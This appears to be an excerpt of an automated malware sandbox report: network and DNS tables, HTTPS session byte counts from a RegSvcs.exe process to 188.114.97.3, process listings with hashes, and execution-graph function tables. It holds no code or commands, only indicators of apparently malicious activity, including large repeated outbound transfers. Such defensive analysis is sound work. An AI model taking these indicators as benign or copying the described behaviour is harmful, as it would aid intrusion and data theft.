Jan 14, 2025 18:01:16.909657955 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:16.909725904 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:16.909849882 CET | 49737 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:16.909871101 CET | 443 | 49737 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:17.021035910 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:17.021094084 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:17.021189928 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:17.021688938 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:17.021708965 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:17.485676050 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:17.485914946 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:17.487227917 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:17.487234116 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:17.487478018 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:17.488759995 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:17.488931894 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:17.488955975 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:17.489047050 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:17.489056110 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:17.975634098 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:17.975755930 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:17.975810051 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:17.976016045 CET | 49745 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:17.976035118 CET | 443 | 49745 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:18.069391966 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:18.069426060 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:18.069499969 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:18.069756031 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:18.069768906 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:18.528961897 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:18.529051065 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:18.530316114 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:18.530329943 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:18.530612946 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:18.532210112 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:18.532210112 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:18.532267094 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:18.991791964 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:18.991883039 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:18.992021084 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:18.992149115 CET | 49751 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:18.992171049 CET | 443 | 49751 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.344208002 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.344248056 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.344347000 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.344767094 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.344779015 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.821060896 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.821171045 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.822504044 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.822509050 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.822828054 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.825705051 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.826838017 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.826858044 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.826955080 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.826970100 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.827203035 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.827219963 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.827336073 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.827366114 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.827491999 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.827506065 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.827637911 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.827661991 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.827670097 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.827675104 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.827802896 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.827816963 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.827833891 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.827852964 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.827934980 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.827958107 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.827975035 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.839077950 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:19.839234114 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.839260101 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.839281082 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:19.839335918 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:22.597553968 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:22.597677946 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:22.597740889 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:22.614237070 CET | 49761 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:22.614257097 CET | 443 | 49761 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:22.731779099 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:22.731803894 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:22.731873035 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:22.734308004 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:22.734321117 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:23.192516088 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:23.192598104 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:23.194139004 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:23.194149017 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:23.194397926 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:23.195614100 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:23.195636988 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:23.195694923 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:23.963156939 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:23.963255882 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
Jan 14, 2025 18:01:23.963323116 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:23.963587046 CET | 49782 | 443 | 192.168.2.10 | 188.114.97.3 |
Jan 14, 2025 18:01:23.963601112 CET | 443 | 49782 | 188.114.97.3 | 192.168.2.10 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 14, 2025 18:01:09.868068933 CET | 54196 | 53 | 192.168.2.10 | 1.1.1.1 |
Jan 14, 2025 18:01:09.876349926 CET | 53 | 54196 | 1.1.1.1 | 192.168.2.10 |
Jan 14, 2025 18:01:09.877880096 CET | 64828 | 53 | 192.168.2.10 | 1.1.1.1 |
Jan 14, 2025 18:01:09.886950016 CET | 53 | 64828 | 1.1.1.1 | 192.168.2.10 |
Jan 14, 2025 18:01:09.890770912 CET | 57637 | 53 | 192.168.2.10 | 1.1.1.1 |
Jan 14, 2025 18:01:09.900130987 CET | 53 | 57637 | 1.1.1.1 | 192.168.2.10 |
Jan 14, 2025 18:01:09.903270960 CET | 57333 | 53 | 192.168.2.10 | 1.1.1.1 |
Jan 14, 2025 18:01:09.911900043 CET | 53 | 57333 | 1.1.1.1 | 192.168.2.10 |
Jan 14, 2025 18:01:09.914056063 CET | 54253 | 53 | 192.168.2.10 | 1.1.1.1 |
Jan 14, 2025 18:01:09.923238039 CET | 53 | 54253 | 1.1.1.1 | 192.168.2.10 |
Jan 14, 2025 18:01:09.924696922 CET | 57389 | 53 | 192.168.2.10 | 1.1.1.1 |
Jan 14, 2025 18:01:09.933404922 CET | 53 | 57389 | 1.1.1.1 | 192.168.2.10 |
Jan 14, 2025 18:01:09.936321974 CET | 62955 | 53 | 192.168.2.10 | 1.1.1.1 |
Jan 14, 2025 18:01:09.945915937 CET | 53 | 62955 | 1.1.1.1 | 192.168.2.10 |
Jan 14, 2025 18:01:09.947254896 CET | 64010 | 53 | 192.168.2.10 | 1.1.1.1 |
Jan 14, 2025 18:01:09.958478928 CET | 53 | 64010 | 1.1.1.1 | 192.168.2.10 |
Jan 14, 2025 18:01:09.959949970 CET | 61007 | 53 | 192.168.2.10 | 1.1.1.1 |
Jan 14, 2025 18:01:09.966897964 CET | 53 | 61007 | 1.1.1.1 | 192.168.2.10 |
Jan 14, 2025 18:01:11.898705006 CET | 57898 | 53 | 192.168.2.10 | 1.1.1.1 |
Jan 14, 2025 18:01:11.908072948 CET | 53 | 57898 | 1.1.1.1 | 192.168.2.10 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 14, 2025 18:01:09.868068933 CET | 192.168.2.10 | 1.1.1.1 | 0x8b67 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.877880096 CET | 192.168.2.10 | 1.1.1.1 | 0x402c | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.890770912 CET | 192.168.2.10 | 1.1.1.1 | 0x115c | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.903270960 CET | 192.168.2.10 | 1.1.1.1 | 0x61b | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.914056063 CET | 192.168.2.10 | 1.1.1.1 | 0x41af | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.924696922 CET | 192.168.2.10 | 1.1.1.1 | 0x4527 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.936321974 CET | 192.168.2.10 | 1.1.1.1 | 0x1038 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.947254896 CET | 192.168.2.10 | 1.1.1.1 | 0x50b1 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.959949970 CET | 192.168.2.10 | 1.1.1.1 | 0x7537 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:11.898705006 CET | 192.168.2.10 | 1.1.1.1 | 0xb087 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 14, 2025 18:01:09.876349926 CET | 1.1.1.1 | 192.168.2.10 | 0x8b67 | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.886950016 CET | 1.1.1.1 | 192.168.2.10 | 0x402c | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.900130987 CET | 1.1.1.1 | 192.168.2.10 | 0x115c | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.911900043 CET | 1.1.1.1 | 192.168.2.10 | 0x61b | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.923238039 CET | 1.1.1.1 | 192.168.2.10 | 0x41af | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.933404922 CET | 1.1.1.1 | 192.168.2.10 | 0x4527 | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.945915937 CET | 1.1.1.1 | 192.168.2.10 | 0x1038 | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.958478928 CET | 1.1.1.1 | 192.168.2.10 | 0x50b1 | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:09.966897964 CET | 1.1.1.1 | 192.168.2.10 | 0x7537 | No error (0) | | | 104.102.49.254 | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:11.908072948 CET | 1.1.1.1 | 192.168.2.10 | 0xb087 | No error (0) | | | 188.114.97.3 | A (IP address) | IN (0x0001) | false |
Jan 14, 2025 18:01:11.908072948 CET | 1.1.1.1 | 192.168.2.10 | 0xb087 | No error (0) | | | 188.114.96.3 | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.10 | 49704 | 104.102.49.254 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:01:11 UTC | 219 | OUT | |
2025-01-14 17:01:11 UTC | 1905 | IN | |
2025-01-14 17:01:11 UTC | 14479 | IN | |
2025-01-14 17:01:11 UTC | 16384 | IN | |
2025-01-14 17:01:11 UTC | 3768 | IN | |
2025-01-14 17:01:11 UTC | 510 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.10 | 49711 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:01:12 UTC | 266 | OUT | |
2025-01-14 17:01:12 UTC | 8 | OUT | |
2025-01-14 17:01:13 UTC | 1125 | IN | |
2025-01-14 17:01:13 UTC | 7 | IN | |
2025-01-14 17:01:13 UTC | 5 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:01:13 UTC | 267 | OUT | |
2025-01-14 17:01:13 UTC | 47 | OUT | |
2025-01-14 17:01:14 UTC | 1128 | IN | |
2025-01-14 17:01:14 UTC | 241 | IN | |
2025-01-14 17:01:14 UTC | 1369 | IN | |
2025-01-14 17:01:14 UTC | 1369 | IN | |
2025-01-14 17:01:14 UTC | 1369 | IN | |
2025-01-14 17:01:14 UTC | 1369 | IN | |
2025-01-14 17:01:14 UTC | 1369 | IN | |
2025-01-14 17:01:14 UTC | 1369 | IN | |
2025-01-14 17:01:14 UTC | 1369 | IN | |
2025-01-14 17:01:14 UTC | 1369 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.10 | 49728 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:01:14 UTC | 281 | OUT | |
2025-01-14 17:01:14 UTC | 12823 | OUT | |
2025-01-14 17:01:15 UTC | 1132 | IN | |
2025-01-14 17:01:15 UTC | 20 | IN | |
2025-01-14 17:01:15 UTC | 5 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.10 | 49737 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:01:16 UTC | 277 | OUT | |
2025-01-14 17:01:16 UTC | 15026 | OUT | |
2025-01-14 17:01:16 UTC | 1128 | IN | |
2025-01-14 17:01:16 UTC | 20 | IN | |
2025-01-14 17:01:16 UTC | 5 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.10 | 49745 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:01:17 UTC | 285 | OUT | |
2025-01-14 17:01:17 UTC | 15331 | OUT | |
2025-01-14 17:01:17 UTC | 5105 | OUT | |
2025-01-14 17:01:17 UTC | 1129 | IN | |
2025-01-14 17:01:17 UTC | 20 | IN | |
2025-01-14 17:01:17 UTC | 5 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.10 | 49751 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:01:18 UTC | 280 | OUT | |
2025-01-14 17:01:18 UTC | 1212 | OUT | |
2025-01-14 17:01:18 UTC | 1130 | IN | |
2025-01-14 17:01:18 UTC | 20 | IN | |
2025-01-14 17:01:18 UTC | 5 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.10 | 49761 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:01:19 UTC | 277 | OUT | |
2025-01-14 17:01:19 UTC | 15331 | OUT | |
2025-01-14 17:01:19 UTC | 15331 | OUT | |
2025-01-14 17:01:19 UTC | 15331 | OUT | |
2025-01-14 17:01:19 UTC | 15331 | OUT | |
2025-01-14 17:01:19 UTC | 15331 | OUT | |
2025-01-14 17:01:19 UTC | 15331 | OUT | |
2025-01-14 17:01:19 UTC | 15331 | OUT | |
2025-01-14 17:01:19 UTC | 15331 | OUT | |
2025-01-14 17:01:19 UTC | 15331 | OUT | |
2025-01-14 17:01:19 UTC | 15331 | OUT | |
2025-01-14 17:01:22 UTC | 1131 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.10 | 49782 | 188.114.97.3 | 443 | 7912 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-14 17:01:23 UTC | 267 | OUT | |
2025-01-14 17:01:23 UTC | 82 | OUT | |
2025-01-14 17:01:23 UTC | 1123 | IN | |
2025-01-14 17:01:23 UTC | 54 | IN | |
2025-01-14 17:01:23 UTC | 5 | IN | |
Target ID: | 1 |
Start time: | 12:01:05 |
Start date: | 14/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b2bb0000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 12:01:05 |
Start date: | 14/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff620390000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 12:01:09 |
Start date: | 14/01/2025 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x190000 |
File size: | 45'984 bytes |
MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 9 |
Start time: | 12:01:09 |
Start date: | 14/01/2025 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x150000 |
File size: | 45'984 bytes |
MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 10 |
Start time: | 12:01:09 |
Start date: | 14/01/2025 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xa40000 |
File size: | 45'984 bytes |
MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Execution Graph
Execution Coverage: | 2% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 0% |
Total number of Nodes: | 5 |
Total number of Limit Nodes: | 0 |
Graph
Function | Relevance | Instructions | Tags |
---|---|---|---|
00007FF7C10A0FA4 | .8 | 850 | COMMON |
00007FF7C10A1390 | .2 | 180 | COMMON |
00007FF7C10A1648 | 1.2 | 1177 | COMMON |
00007FF7C0FD514A | .2 | 172 | COMMON |
00007FF7C0FDA5D9 | .1 | 118 | COMMON |
00007FF7C0FDA619 | .1 | 67 | COMMON |
00007FF7C0FD5198 | .1 | 65 | COMMON |
Execution Graph
Execution Coverage: | 8.7% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 48.6% |
Total number of Nodes: | 286 |
Total number of Limit Nodes: | 29 |
Graph
Function | Relevance | APIs | Strings | Instructions | Tags |
---|---|---|---|---|---|
0043B500 | 30.5 | 11 | 6 | 745 | memory, com, COMMON |
00408860 | 12.4 | 5 | 2 | 190 | thread, COMMON |
004097E0 | 9.2 | | 7 | 404 | COMMON |
0040AEC0 | 2.7 | | 2 | 249 | COMMON |
0042EA61 | 1.8 | 1 | | 312 | COMMON |
0043FCF0 | 1.5 | 1 | | 14 | library, COMMON |
0043E560 | 1.5 | | 1 | 208 | COMMON |
00441EC0 | 1.3 | | 1 | 74 | COMMON |
00427B30 | .3 | | | 282 | COMMON |
00420B20 | .1 | | | 103 | COMMON |
0040BA1B | .1 | | | 89 | COMMON |
0043FB02 | .0 | | | 40 | COMMON |
0042E09A | 1.6 | 1 | | 100 | COMMON |
0043FEB4 | 1.5 | 1 | | 44 | COMMON |
0043FC80 | 1.5 | 1 | | 31 | memory, COMMON |
004357CC | 1.5 | 1 | | 28 | COMMON |
00432F73 | 1.5 | 1 | | 22 | COMMON |
0040CAC0 | 1.5 | 1 | | 20 | COMMON |
0040CAFE | 1.5 | 1 | | 17 | COMMON |
0043E530 | 1.5 | 1 | | 15 | memory, COMMON |
0043E510 | 1.5 | 1 | | 9 | memory, COMMON |
00425870 | 19.5 | | 15 | 726 | COMMON |
0042D2E0 | 12.7 | | 10 | 242 | COMMON |
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00409390 Relevance: 10.4, Strings: 8, Instructions: 391COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00416258 Relevance: 10.3, Strings: 8, Instructions: 277COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00427E30 Relevance: 6.8, Strings: 5, Instructions: 578COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0041ADE2 Relevance: 6.7, Strings: 5, Instructions: 496COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0043EB40 Relevance: 5.6, Strings: 4, Instructions: 629COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00416A39 Relevance: 4.4, Strings: 3, Instructions: 648COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00427E50 Relevance: 4.4, Strings: 3, Instructions: 644COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0041A7C6 Relevance: 3.9, Strings: 3, Instructions: 161COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00413C90 Relevance: 2.9, Strings: 2, Instructions: 402COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0041C620 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00429CD0 Relevance: 2.6, Strings: 2, Instructions: 143COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0042E25A Relevance: 2.6, Strings: 2, Instructions: 94COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00417AB2 Relevance: 1.9, Strings: 1, Instructions: 661COMMON
Strings |
|
Memory Dump Source |
|
